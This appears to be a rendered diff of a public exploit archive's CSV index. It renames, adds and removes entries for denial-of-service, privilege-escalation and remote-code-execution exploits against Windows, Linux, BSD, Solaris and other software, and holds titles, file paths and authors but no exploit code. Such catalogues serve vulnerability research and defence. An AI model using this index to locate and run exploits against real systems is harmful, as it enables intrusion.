19413,platforms/windows/dos/19413.c,"Microsoft Windows 95/98 / NT Enterprise Server 4.0 SP5 / NT Terminal Server 4.0 SP4 / NT Workstation 4.0 SP5 - Denial of Service (1)",1999-07-03,Coolio,windows,dos,0
|
||||
19391,platforms/windows/dos/19391.py,"Slimpdf Reader 1.0 - Memory Corruption",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,0
|
||||
|
|
@ -2305,6 +2306,7 @@ id,file,description,date,author,platform,type,port
|
|||
19488,platforms/bsd/dos/19488.c,"FreeBSD 5.0 / NetBSD 1.4.2 / OpenBSD 2.7 - 'setsockopt()' Denial of Service",1999-09-05,"L. Sassaman",bsd,dos,0
|
||||
19489,platforms/windows/dos/19489.txt,"Microsoft Windows NT 4.0 - DCOM Server",1999-09-08,Mnemonix,windows,dos,0
|
||||
19505,platforms/freebsd/dos/19505.c,"FreeBSD 3.0/3.1/3.2 vfs_cache - Denial of Service",1999-09-22,"Charles M. Hannum",freebsd,dos,0
|
||||
19507,platforms/solaris/dos/19507.txt,"Solaris 7.0 - Recursive mutex_enter Remote Panic (Denial of Service)",1999-09-23,"David Brumley",solaris,dos,0
|
||||
19513,platforms/hardware/dos/19513.txt,"Eicon Networks DIVA LAN ISDN Modem 1.0 Release 2.5/1.0/2.0 - Denial of Service",1999-09-27,"Bjorn Stickler",hardware,dos,0
|
||||
19536,platforms/multiple/dos/19536.txt,"Apache 1.1 / NCSA httpd 1.5.2 / Netscape Server 1.12/1.1/2.0 - a nph-test-cgi Exploit",1996-12-10,"Josh Richards",multiple,dos,0
|
||||
19541,platforms/novell/dos/19541.txt,"Novell Client 3.0/3.0.1 - Denial of Service",1999-10-08,"Bruce Dennison",novell,dos,0
|
||||
|
|
@ -2744,7 +2746,7 @@ id,file,description,date,author,platform,type,port
|
|||
22061,platforms/linux/dos/22061.txt,"Cyrus IMAPD 1.4/1.5.19/2.0.12/2.0.16/2.1.9/2.1.10 - Pre-Login Heap Corruption",2002-12-02,"Timo Sirainen",linux,dos,0
|
||||
22062,platforms/hardware/dos/22062.py,"Linksys Devices 1.42/1.43 - GET Buffer Overflow",2002-12-03,"Core Security",hardware,dos,0
|
||||
22068,platforms/unix/dos/22068.pl,"Apache 1.3.x + Tomcat 4.0.x/4.1.x (Mod_JK) - Chunked Encoding Denial of Service",2002-12-04,Sapient2003,unix,dos,0
|
||||
22074,platforms/osx/dos/22074.txt,"Apple Mac OSX 10.2.2 - Directory Kernel Panic Denial of Service",2002-11-07,shibby,osx,dos,0
|
||||
22074,platforms/osx/dos/22074.txt,"Apple Mac OSX 10.2.2 - Directory Kernel Panic (Denial of Service)",2002-11-07,shibby,osx,dos,0
|
||||
22079,platforms/linux/dos/22079.sh,"ProFTPd 1.2.x - 'STAT' Denial of Service",2002-12-09,"Rob klein Gunnewiek",linux,dos,0
|
||||
22081,platforms/windows/dos/22081.pl,"Mollensoft Software Enceladus Server Suite 3.9 - FTP Command Buffer Overflow",2002-12-09,"Tamer Sahin",windows,dos,0
|
||||
22100,platforms/windows/dos/22100.txt,"Microsoft Internet Explorer 9 - Cross-Site Scripting Filter Bypass",2012-10-19,"Jean Pascal Pereira",windows,dos,0
|
||||
|
|
@ -4376,7 +4378,7 @@ id,file,description,date,author,platform,type,port
|
|||
34980,platforms/novell/dos/34980.py,"Novell Groupwise 8.0 - Multiple Remote Vulnerabilities",2010-11-08,"Francis Provencher",novell,dos,0
|
||||
35013,platforms/linux/dos/35013.c,"Linux Kernel 2.6.x - 'inotify_init()' Memory Leak Local Denial of Service",2010-11-24,"Vegard Nossum",linux,dos,0
|
||||
35000,platforms/windows/dos/35000.txt,"SAP NetWeaver Enqueue Server - Denial of Service",2014-10-17,"Core Security",windows,dos,3200
|
||||
35058,platforms/bsd/dos/35058.c,"OpenBSD 5.5 - Local Kernel Panic",2014-10-25,nitr0us,bsd,dos,0
|
||||
35058,platforms/bsd/dos/35058.c,"OpenBSD 5.5 - Local Kernel Panic (Denial of Service)",2014-10-25,nitr0us,bsd,dos,0
|
||||
40099,platforms/multiple/dos/40099.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font '.ttf' Memory Corruption (5)",2016-07-13,COSIG,multiple,dos,0
|
||||
40100,platforms/multiple/dos/40100.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font '.ttf' Memory Corruption (6)",2016-07-13,COSIG,multiple,dos,0
|
||||
40101,platforms/multiple/dos/40101.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font '.ttf' Memory Corruption (7)",2016-07-13,COSIG,multiple,dos,0
|
||||
|
|
@ -4528,6 +4530,7 @@ id,file,description,date,author,platform,type,port
|
|||
36776,platforms/windows/dos/36776.py,"Microsoft Windows - 'HTTP.sys' HTTP Request Parsing Denial of Service (MS15-034)",2015-04-16,"laurent gaffie",windows,dos,80
|
||||
36788,platforms/windows/dos/36788.txt,"Oracle - Outside-In '.DOCX' File Parsing Memory Corruption",2015-04-17,"Francis Provencher",windows,dos,0
|
||||
36789,platforms/php/dos/36789.php,"PHP 5.3.8 - Remote Denial of Service",2011-12-18,anonymous,php,dos,0
|
||||
36799,platforms/bsd/dos/36799.c,"OpenBSD 5.6 - Multiple Local Kernel Panics (Denial of Service)",2015-04-21,nitr0us,bsd,dos,0
|
||||
36814,platforms/osx/dos/36814.c,"Apple Mac OSX - Local Denial of Service",2015-04-21,"Maxime Villard",osx,dos,0
|
||||
36825,platforms/hardware/dos/36825.php,"ZYXEL P-660HN-T1H_IPv6 - Remote Configuration Editor / Web Server Denial of Service",2015-04-23,"Koorosh Ghorbani",hardware,dos,80
|
||||
36840,platforms/multiple/dos/36840.py,"Wireshark 1.12.4 - Memory Corruption and Access Violation (PoC)",2015-04-27,"Avinash Thapa",multiple,dos,0
|
||||
|
|
@ -5057,7 +5060,7 @@ id,file,description,date,author,platform,type,port
|
|||
39561,platforms/windows/dos/39561.txt,"Microsoft Windows Kernel - 'ATMFD.dll' OTF Font Processing Stack Corruption (MS16-026)",2016-03-14,"Google Security Research",windows,dos,0
|
||||
39562,platforms/windows/dos/39562.html,"Microsoft Internet Explorer - Read AV in MSHTML!Layout::LayoutBuilderDivider::BuildPageLayout (MS16-023)",2016-03-14,"Google Security Research",windows,dos,0
|
||||
39565,platforms/windows/dos/39565.txt,"Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow",2016-03-16,LiquidWorm,windows,dos,0
|
||||
39570,platforms/freebsd_x86-64/dos/39570.c,"FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow",2016-03-16,"Core Security",freebsd_x86-64,dos,0
|
||||
39570,platforms/freebsd_x86-64/dos/39570.c,"FreeBSD 10.2 Kernel (x64) - 'amd64_set_ldt' Heap Overflow",2016-03-16,"Core Security",freebsd_x86-64,dos,0
|
||||
39600,platforms/windows/dos/39600.txt,"Avira - Heap Underflow Parsing PE Section Headers",2016-03-23,"Google Security Research",windows,dos,0
|
||||
39601,platforms/windows/dos/39601.txt,"Comodo - PackMan Unpacker Insufficient Parameter Validation",2016-03-23,"Google Security Research",windows,dos,0
|
||||
39602,platforms/windows/dos/39602.txt,"Comodo - LZMA Decoder Heap Overflow via Insufficient Parameter Checks",2016-03-23,"Google Security Research",windows,dos,0
|
||||
|
|
@ -5675,7 +5678,7 @@ id,file,description,date,author,platform,type,port
|
|||
42742,platforms/windows/dos/42742.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiGetPhysicalMonitorDescription' Stack Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0
|
||||
42743,platforms/windows/dos/42743.cpp,"Microsoft Windows Kernel - 'nt!NtSetIoCompletion / nt!NtRemoveIoCompletion' Pool Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0
|
||||
42744,platforms/windows/dos/42744.txt,"Microsoft Windows Kernel - win32k.sys .TTF Font Processing - Out-of-Bounds Reads/Writes with Malformed 'fpgm' table (win32k!bGeneratePath)",2017-09-18,"Google Security Research",windows,dos,0
|
||||
42746,platforms/windows/dos/42746.txt,"Microsoft Windows Kernel - .win32k.sys TTF Font Processing Out-of-Bounds Read with Malformed 'glyf' Table (win32k!fsc_CalcGrayRow)",2017-09-18,"Google Security Research",windows,dos,0
|
||||
42746,platforms/windows/dos/42746.txt,"Microsoft Windows Kernel - win32k.sys .TTF Font Processing Out-of-Bounds Read with Malformed 'glyf' Table (win32k!fsc_CalcGrayRow)",2017-09-18,"Google Security Research",windows,dos,0
|
||||
42748,platforms/windows/dos/42748.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiEngCreatePalette' Stack Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0
|
||||
42749,platforms/windows/dos/42749.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiDoBanding' Stack Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0
|
||||
42758,platforms/windows/dos/42758.txt,"Microsoft Edge 38.14393.1066.0 - Memory Corruption with Partial Page Loading",2017-09-19,"Google Security Research",windows,dos,0
|
||||
|
|
@ -5697,10 +5700,11 @@ id,file,description,date,author,platform,type,port
|
|||
42944,platforms/multiple/dos/42944.py,"Dnsmasq < 2.78 - Information Leak",2017-10-02,"Google Security Research",multiple,dos,0
|
||||
42945,platforms/multiple/dos/42945.py,"Dnsmasq < 2.78 - Lack of free() Denial of Service",2017-10-02,"Google Security Research",multiple,dos,0
|
||||
42946,platforms/multiple/dos/42946.py,"Dnsmasq < 2.78 - Integer Underflow",2017-10-02,"Google Security Research",multiple,dos,0
|
||||
42955,platforms/multiple/dos/42955.html,"WebKit JSC - 'BytecodeGenerator::emitGetByVal' Incorrect Optimization (2)",2017-10-04,"Google Security Research",multiple,dos,0
|
||||
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
|
||||
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
|
||||
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
|
||||
15,platforms/osx/local/15.c,"Apple Mac OSX 10.2.4 - DirectoryService (PATH) Privilege Escalation",2003-04-18,"Neeko Oni",osx,local,0
|
||||
15,platforms/osx/local/15.c,"Apple Mac OSX 10.2.4 - DirectoryService 'PATH' Privilege Escalation",2003-04-18,"Neeko Oni",osx,local,0
|
||||
21,platforms/linux/local/21.c,"Qpopper 4.0.x - poppassd Privilege Escalation",2003-04-29,Xpl017Elz,linux,local,0
|
||||
29,platforms/bsd/local/29.c,"Firebird 1.0.2 (FreeBSD 4.7-RELEASE) - Privilege Escalation",2003-05-12,bob,bsd,local,0
|
||||
31,platforms/linux/local/31.pl,"CDRTools CDRecord 2.0 (Mandrake / Slackware) - Privilege Escalation",2003-05-14,anonymous,linux,local,0
|
||||
|
|
@ -5854,7 +5858,7 @@ id,file,description,date,author,platform,type,port
|
|||
714,platforms/solaris/local/714.c,"Solaris 7/8/9 CDE LibDTHelp - Local Buffer Overflow (2)",2004-12-24,"Marco Ivaldi",solaris,local,0
|
||||
715,platforms/solaris/local/715.c,"Solaris 8/9 passwd - 'circ()' Privilege Escalation",2004-12-24,"Marco Ivaldi",solaris,local,0
|
||||
718,platforms/linux/local/718.c,"Linux Kernel < 2.6.7-rc3 (Slackware 9.1 / Debian 3.0) - 'sys_chown()' Group Ownership Alteration Privilege Escalation",2004-12-24,"Marco Ivaldi",linux,local,0
|
||||
739,platforms/bsd/local/739.c,"FreeBSD TOP - Format String",2001-07-23,truefinder,bsd,local,0
|
||||
739,platforms/bsd/local/739.c,"FreeBSD /usr/bin/top - Format String",2001-07-23,truefinder,bsd,local,0
|
||||
741,platforms/linux/local/741.pl,"HTGET 0.9.x - Privilege Escalation",2005-01-05,nekd0,linux,local,0
|
||||
744,platforms/linux/local/744.c,"Linux Kernel 2.4.29-rc2 - 'uselib()' Privilege Escalation (1)",2005-01-07,"Paul Starzetz",linux,local,0
|
||||
749,platforms/windows/local/749.cpp,"Microsoft Windows - Improper Token Validation Local Exploit",2005-01-11,"Cesar Cerrudo",windows,local,0
|
||||
|
|
@ -5957,7 +5961,7 @@ id,file,description,date,author,platform,type,port
|
|||
1198,platforms/windows/local/1198.c,"Microsoft Windows - CSRSS Privilege Escalation (MS05-018)",2005-09-06,eyas,windows,local,0
|
||||
1215,platforms/linux/local/1215.c,"Wireless Tools 26 (IWConfig) - Privilege Escalation",2005-09-14,Qnix,linux,local,0
|
||||
1229,platforms/linux/local/1229.sh,"Qpopper 4.0.8 (Linux) - 'poppassd' Privilege Escalation",2005-09-24,kingcope,linux,local,0
|
||||
1230,platforms/bsd/local/1230.sh,"Qpopper 4.0.8 (FreeBSD) - (poppassd) Privilege Escalation",2005-09-24,kingcope,bsd,local,0
|
||||
1230,platforms/bsd/local/1230.sh,"Qpopper 4.0.8 (FreeBSD) - Privilege Escalation",2005-09-24,kingcope,bsd,local,0
|
||||
1248,platforms/solaris/local/1248.pl,"Solaris 10 (x86) - DtPrintinfo/Session Privilege Escalation",2005-10-12,"Charles Stevenson",solaris,local,0
|
||||
1267,platforms/linux/local/1267.c,"XMail 1.21 - '-t' Command Line Option Buffer Overflow Privilege Escalation",2005-10-20,qaaz,linux,local,0
|
||||
1297,platforms/linux/local/1297.py,"F-Secure Internet GateKeeper for Linux < 2.15.484 (and Gateway < 2.16) - Privilege Escalation",2005-11-07,"Xavier de Leon",linux,local,0
|
||||
|
|
@ -6286,7 +6290,7 @@ id,file,description,date,author,platform,type,port
|
|||
7006,platforms/windows/local/7006.txt,"Adobe Reader - 'util.printf()' JavaScript Function Stack Overflow (2)",2008-11-05,"Debasis Mohanty",windows,local,0
|
||||
7051,platforms/windows/local/7051.pl,"VideoLAN VLC Media Player < 0.9.6 - '.rt' Stack Buffer Overflow",2008-11-07,SkD,windows,local,0
|
||||
7054,platforms/windows/local/7054.txt,"Anti-Keylogger Elite 3.3.0 - 'AKEProtect.sys' Privilege Escalation",2008-11-07,"NT Internals",windows,local,0
|
||||
7129,platforms/multiple/local/7129.sh,"Sudo 1.6.9p18 - (Defaults setenv) Privilege Escalation",2008-11-15,kingcope,multiple,local,0
|
||||
7129,platforms/multiple/local/7129.sh,"Sudo 1.6.9p18 - 'Defaults SetEnv' Privilege Escalation",2008-11-15,kingcope,multiple,local,0
|
||||
7135,platforms/windows/local/7135.htm,"Opera 9.62 - 'file://' Local Heap Overflow",2008-11-17,"Guido Landi",windows,local,0
|
||||
7171,platforms/multiple/local/7171.txt,"PHP 5.2.6 - 'error_log' Safe_mode Bypass Exploit",2008-11-20,SecurityReason,multiple,local,0
|
||||
7177,platforms/linux/local/7177.c,"Oracle Database Vault - 'ptrace(2)' Privilege Escalation",2008-11-20,"Jakub Wartak",linux,local,0
|
||||
|
|
@ -6624,7 +6628,7 @@ id,file,description,date,author,platform,type,port
|
|||
10226,platforms/windows/local/10226.py,"Serenity Audio Player Playlist - '.m3u' Buffer Overflow",2009-11-25,Rick2600,windows,local,0
|
||||
10240,platforms/windows/local/10240.py,"Millenium MP3 Studio 2.0 - (pls) Buffer Overflow",2009-11-28,Molotov,windows,local,0
|
||||
10244,platforms/windows/local/10244.txt,"MuPDF < 20091125231942 - pdf_shade4.c Multiple Stack Based Buffer Overflows",2009-11-28,"Christophe Devine",windows,local,0
|
||||
10255,platforms/bsd/local/10255.txt,"FreeBSD 8.0 Run-Time Link-Editor (rtld) - Privilege Escalation",2009-11-30,kingcope,bsd,local,0
|
||||
10255,platforms/bsd/local/10255.txt,"FreeBSD 8.0 Run-Time Link-Editor (RTLD) - Privilege Escalation",2009-11-30,kingcope,bsd,local,0
|
||||
10264,platforms/multiple/local/10264.txt,"Oracle - SYS.LT.MERGEWORKSPACE Evil Cursor Exploit",2009-12-01,"Andrea Purificato",multiple,local,0
|
||||
10265,platforms/multiple/local/10265.txt,"Oracle - SYS.LT.COMPRESSWORKSPACETREE Evil Cursor Exploit",2009-12-01,"Andrea Purificato",multiple,local,0
|
||||
10266,platforms/multiple/local/10266.txt,"Oracle - ctxsys.drvxtabc.create_tables Evil Cursor Exploit",2009-12-01,"Andrea Purificato",multiple,local,0
|
||||
|
|
@ -7312,7 +7316,6 @@ id,file,description,date,author,platform,type,port
|
|||
19125,platforms/linux/local/19125.txt,"Oracle 8 - oratclsh Suid",1999-04-29,"Dan Sugalski",linux,local,0
|
||||
19126,platforms/solaris/local/19126.txt,"Sun Solaris 2.6 power management - Exploit",1998-07-16,"Ralf Lehmann",solaris,local,0
|
||||
19128,platforms/solaris/local/19128.c,"Sun Solaris 7.0 sdtcm_convert - Exploit",1998-10-23,UNYUN,solaris,local,0
|
||||
19130,platforms/freebsd/local/19130.c,"FreeBSD 3.0 - UNIX-domain panic",1999-05-05,"Lukasz Luzar",freebsd,local,0
|
||||
19138,platforms/windows/local/19138.txt,"ESRI ArcGIS 10.0.x / ArcMap 9 - Arbitrary Code Execution",2012-06-14,"Boston Cyber Defense",windows,local,0
|
||||
19139,platforms/multiple/local/19139.py,"Adobe Illustrator CS5.5 - Memory Corruption",2012-06-14,"Felipe Andres Manzano",multiple,local,0
|
||||
19142,platforms/linux/local/19142.sh,"Oracle 8 - File Access",1999-05-06,"Kevin Wenchel",linux,local,0
|
||||
|
|
@ -7707,7 +7710,7 @@ id,file,description,date,author,platform,type,port
|
|||
20338,platforms/linux/local/20338.c,"Samba 2.0.7 - SWAT Symlink (1)",2000-11-01,Optyx,linux,local,0
|
||||
20339,platforms/linux/local/20339.sh,"Samba 2.0.7 - SWAT Symlink (2)",2000-11-01,Optyx,linux,local,0
|
||||
20341,platforms/linux/local/20341.sh,"Samba 2.0.7 - SWAT Logfile Permissions",2000-11-01,miah,linux,local,0
|
||||
20377,platforms/freebsd/local/20377.c,"FreeBSD 3.5/4.x - top Format String",2000-11-01,truefinder,freebsd,local,0
|
||||
20377,platforms/freebsd/local/20377.c,"FreeBSD 3.5/4.x /usr/bin/top - Format String",2000-11-01,truefinder,freebsd,local,0
|
||||
20378,platforms/linux/local/20378.pl,"Debian top - Format String",2004-12-12,"Kevin Finisterre",linux,local,0
|
||||
20380,platforms/unix/local/20380.c,"ManTrap 1.6.1 - Hidden Process Disclosure",2000-11-01,f8labs,unix,local,0
|
||||
20381,platforms/unix/local/20381.c,"ManTrap 1.6.1 - Root Directory Inode Disclosure",2000-11-01,f8labs,unix,local,0
|
||||
|
|
@ -8722,7 +8725,6 @@ id,file,description,date,author,platform,type,port
|
|||
36746,platforms/linux/local/36746.c,"Apport/Abrt (Ubuntu / Fedora) - Privilege Escalation",2015-04-14,"Tavis Ormandy",linux,local,0
|
||||
36745,platforms/osx/local/36745.rb,"Apple Mac OSX - 'Rootpipe' Privilege Escalation (Metasploit)",2015-04-13,Metasploit,osx,local,0
|
||||
36782,platforms/linux/local/36782.sh,"Apport 2.14.1 (Ubuntu 14.04.2) - Privilege Escalation",2015-04-17,"Ricardo F. Teixeira",linux,local,0
|
||||
36799,platforms/bsd/local/36799.c,"OpenBSD 5.6 - Multiple Local Kernel Panics",2015-04-21,nitr0us,bsd,local,0
|
||||
36813,platforms/hardware/local/36813.txt,"ADB - Backup Archive File Overwrite Directory Traversal",2015-04-21,"Imre Rad",hardware,local,0
|
||||
36819,platforms/windows/local/36819.pl,"MooPlayer 1.3.0 - 'm3u' Buffer Overflow (SEH) (2)",2015-04-22,"Tomislav Paskalev",windows,local,0
|
||||
36820,platforms/linux/local/36820.txt,"usb-creator 0.2.x (Ubuntu 12.04/14.04/14.10) - Privilege Escalation",2015-04-23,"Tavis Ormandy",linux,local,0
|
||||
|
|
@ -9163,7 +9165,7 @@ id,file,description,date,author,platform,type,port
|
|||
41763,platforms/linux/local/41763.txt,"Ubuntu 15.10 - 'USERNS ' Overlayfs Over Fuse Privilege Escalation",2016-11-22,halfdog,linux,local,0
|
||||
41764,platforms/linux/local/41764.txt,"NTP - Privilege Escalation",2016-01-21,halfdog,linux,local,0
|
||||
41765,platforms/linux/local/41765.txt,"Ubuntu 15.04 (Development) - 'Upstart' Logrotation Privilege Escalation",2015-03-12,halfdog,linux,local,0
|
||||
41766,platforms/linux/local/41766.txt,"Vm86 - Syscall Task Switch Kernel Panic / Privilege Escalation",2012-10-19,halfdog,linux,local,0
|
||||
41766,platforms/linux/local/41766.txt,"Vm86 - Syscall Task Switch Kernel Panic (Denial of Service) / Privilege Escalation",2012-10-19,halfdog,linux,local,0
|
||||
41770,platforms/linux/local/41770.txt,"Linux Kernel 2.6.32 (Ubuntu 10.04) - '/proc' Handling SUID Privilege Escalation",2011-01-17,halfdog,linux,local,0
|
||||
41771,platforms/windows/local/41771.py,"Disk Sorter Enterprise 9.5.12 - 'Import Command' Buffer Overflow",2017-03-29,"Daniel Teixeira",windows,local,0
|
||||
41772,platforms/windows/local/41772.py,"DiskBoss Enterprise 7.8.16 - 'Import Command' Buffer Overflow",2017-03-29,"Daniel Teixeira",windows,local,0
|
||||
|
|
@ -9276,16 +9278,17 @@ id,file,description,date,author,platform,type,port
|
|||
42936,platforms/linux/local/42936.txt,"UCOPIA Wireless Appliance < 5.1.8 - Privilege Escalation",2017-10-02,Sysdream,linux,local,0
|
||||
42937,platforms/linux/local/42937.txt,"UCOPIA Wireless Appliance < 5.1.8 - Restricted Shell Escape",2017-10-02,Sysdream,linux,local,0
|
||||
42948,platforms/osx/local/42948.txt,"Apple Mac OS X + Safari - Local Javascript Quarantine Bypass",2017-07-15,"Filippo Cavallarin",osx,local,0
|
||||
42951,platforms/windows/local/42951.py,"DiskBoss Enterprise 8.4.16 - Local Buffer Overflow",2017-10-03,C4t0ps1s,windows,local,0
|
||||
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
|
||||
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
|
||||
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
|
||||
5,platforms/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
|
||||
7,platforms/linux/remote/7.pl,"Samba 2.2.x - Buffer Overflow",2003-04-07,"H D Moore",linux,remote,139
|
||||
8,platforms/linux/remote/8.c,"SETI@home Clients - Buffer Overflow",2003-04-08,zillion,linux,remote,0
|
||||
10,platforms/multiple/remote/10.c,"Samba < 2.2.8 (Linux/BSD) - Remote Code Execution",2003-04-10,eSDee,multiple,remote,139
|
||||
16,platforms/linux/remote/16.c,"PoPToP PPTP 1.1.4-b3 - Remote Command Execution",2003-04-18,einstein,linux,remote,1723
|
||||
18,platforms/linux/remote/18.sh,"Snort 1.9.1 - 'p7snort191.sh' Remote Command Execution",2003-04-23,truff,linux,remote,0
|
||||
19,platforms/linux/remote/19.c,"PoPToP PPTP 1.1.4-b3 - 'poptop-sane.c' Remote Command Execution",2003-04-25,blightninjas,linux,remote,1723
|
||||
20,platforms/windows/remote/20.txt,"Microsoft Windows - SMB Authentication Remote Exploit",2003-04-25,"Haamed Gheibi",windows,remote,139
|
||||
20,platforms/windows/remote/20.txt,"Microsoft Windows 2000/XP - SMB Authentication Remote Exploit",2003-04-25,"Haamed Gheibi",windows,remote,139
|
||||
23,platforms/windows/remote/23.c,"RealServer < 8.0.2 (Windows Platforms) - Remote Exploit",2003-04-30,"Johnny Cyberpunk",windows,remote,554
|
||||
24,platforms/linux/remote/24.c,"Sendmail 8.12.8 (BSD) - 'Prescan()' Remote Command Execution",2003-04-30,bysin,linux,remote,25
|
||||
25,platforms/linux/remote/25.c,"OpenSSH/PAM 3.6.1p1 - Remote Users Discovery Tool",2003-04-30,"Maurizio Agazzini",linux,remote,0
|
||||
|
|
@ -9294,18 +9297,18 @@ id,file,description,date,author,platform,type,port
|
|||
28,platforms/windows/remote/28.c,"Kerio Personal Firewall 2.1.4 - Remote Code Execution",2003-05-08,Burebista,windows,remote,0
|
||||
30,platforms/windows/remote/30.pl,"Snitz Forums 3.3.03 - Remote Command Execution",2003-05-12,anonymous,windows,remote,0
|
||||
33,platforms/linux/remote/33.c,"WsMp3d 0.x - Heap Overflow",2003-05-22,Xpl017Elz,linux,remote,8000
|
||||
34,platforms/linux/remote/34.pl,"Webfroot Shoutbox < 2.32 - (Apache) Remote Exploit",2003-05-29,anonymous,linux,remote,80
|
||||
34,platforms/linux/remote/34.pl,"Webfroot Shoutbox < 2.32 (Apache) - Remote Exploit",2003-05-29,anonymous,linux,remote,80
|
||||
36,platforms/windows/remote/36.c,"Microsoft Windows - WebDAV Remote Code Execution (2)",2003-06-01,alumni,windows,remote,80
|
||||
37,platforms/windows/remote/37.pl,"Microsoft Internet Explorer - Object Tag Exploit (MS03-020)",2003-06-07,alumni,windows,remote,0
|
||||
38,platforms/linux/remote/38.pl,"Apache 2.0.45 - APR Remote Exploit",2003-06-08,"Matthew Murphy",linux,remote,80
|
||||
39,platforms/linux/remote/39.c,"Atftpd 0.6 - 'atftpdx.c' Remote Command Execution",2003-06-10,gunzip,linux,remote,69
|
||||
41,platforms/linux/remote/41.pl,"mnoGoSearch 3.1.20 - Remote Command Execution",2003-06-10,pokleyzz,linux,remote,80
|
||||
42,platforms/windows/remote/42.c,"Winmail Mail Server 2.3 - Remote Format String",2003-06-11,ThreaT,windows,remote,25
|
||||
42,platforms/windows/remote/42.c,"Winmail Mail Server 2.3 Build 0402 - Remote Format String",2003-06-11,ThreaT,windows,remote,25
|
||||
43,platforms/linux/remote/43.pl,"ProFTPd 1.2.9 RC1 - 'mod_sql' SQL Injection",2003-06-19,Spaine,linux,remote,21
|
||||
45,platforms/windows/remote/45.c,"Yahoo Messenger 5.5 - 'DSR-ducky.c' Remote Exploit",2003-06-23,Rave,windows,remote,80
|
||||
46,platforms/linux/remote/46.c,"Kerio MailServer 5.6.3 - Remote Buffer Overflow",2003-06-27,B-r00t,linux,remote,25
|
||||
48,platforms/windows/remote/48.c,"Microsoft Windows Media Services - Remote Exploit (MS03-022)",2003-07-01,firew0rker,windows,remote,80
|
||||
49,platforms/linux/remote/49.c,"Linux eXtremail 1.5.x - Remote Format Strings Exploit",2003-07-02,B-r00t,linux,remote,25
|
||||
49,platforms/linux/remote/49.c,"eXtremail 1.5.x (Linux) - Remote Format Strings Exploit",2003-07-02,B-r00t,linux,remote,25
|
||||
50,platforms/windows/remote/50.pl,"ColdFusion MX - Remote Development Service Exploit",2003-07-07,"angry packet",windows,remote,80
|
||||
51,platforms/windows/remote/51.c,"Microsoft IIS 5.0 - WebDAV Remote Code Execution (3) (xwdav)",2003-07-08,Schizoprenic,windows,remote,80
|
||||
54,platforms/windows/remote/54.c,"LeapWare LeapFTP 2.7.x - Remote Buffer Overflow",2003-07-12,drG4njubas,windows,remote,21
|
||||
|
|
@ -9742,7 +9745,7 @@ id,file,description,date,author,platform,type,port
|
|||
1799,platforms/multiple/remote/1799.txt,"RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Scanner",2006-05-17,class101,multiple,remote,0
|
||||
1813,platforms/linux/remote/1813.c,"Cyrus IMAPD 2.3.2 - 'pop3d' Remote Buffer Overflow (1)",2006-05-21,kingcope,linux,remote,110
|
||||
1862,platforms/cgi/remote/1862.c,"iShopCart - 'vGetPost()' Remote Buffer Overflow (CGI)",2006-06-02,K-sPecial,cgi,remote,0
|
||||
1885,platforms/windows/remote/1885.pl,"QBik WinGate WWW Proxy Server 6.1.1.1077 - (POST) Remote Buffer Overflow",2006-06-07,kingcope,windows,remote,80
|
||||
1885,platforms/windows/remote/1885.pl,"QBik WinGate WWW Proxy Server 6.1.1.1077 - 'POST' Remote Buffer Overflow",2006-06-07,kingcope,windows,remote,80
|
||||
1889,platforms/hardware/remote/1889.txt,"D-Link DWL Series Access-Point 2.10na - Config Disclosure",2006-06-08,INTRUDERS,hardware,remote,0
|
||||
1906,platforms/windows/remote/1906.py,"CesarFTP 0.99g - (MKD) Remote Buffer Overflow",2006-06-12,h07,windows,remote,0
|
||||
1915,platforms/windows/remote/1915.pm,"CesarFTP 0.99g - 'MKD' Remote Buffer Overflow (Metasploit)",2006-06-15,c0rrupt,windows,remote,0
|
||||
|
|
@ -10316,7 +10319,7 @@ id,file,description,date,author,platform,type,port
|
|||
6773,platforms/windows/remote/6773.html,"Hummingbird Deployment Wizard 2008 - ActiveX Command Execution",2008-10-17,shinnai,windows,remote,0
|
||||
6774,platforms/windows/remote/6774.html,"Hummingbird Deployment Wizard 2008 - Registry Values Creation/Change",2008-10-17,shinnai,windows,remote,0
|
||||
6776,platforms/windows/remote/6776.html,"Hummingbird Deployment Wizard 2008 - ActiveX File Execution(2)",2008-10-17,shinnai,windows,remote,0
|
||||
6786,platforms/solaris/remote/6786.pl,"Solaris 9 (UltraSPARC) - sadmind Remote Code Execution",2008-10-19,kingcope,solaris,remote,111
|
||||
6786,platforms/solaris/remote/6786.pl,"Solaris 9 (UltraSPARC) - 'sadmind' Remote Code Execution",2008-10-19,kingcope,solaris,remote,111
|
||||
6793,platforms/windows/remote/6793.html,"Dart Communications PowerTCP FTP module - Remote Buffer Overflow",2008-10-20,InTeL,windows,remote,0
|
||||
6801,platforms/windows/remote/6801.txt,"Opera 9.60 - Persistent Cross-Site Scripting",2008-10-22,"Roberto Suggi Liverani",windows,remote,0
|
||||
6804,platforms/windows/remote/6804.pl,"GoodTech SSH - (SSH_FXP_OPEN) Remote Buffer Overflow",2008-10-22,r0ut3r,windows,remote,22
|
||||
|
|
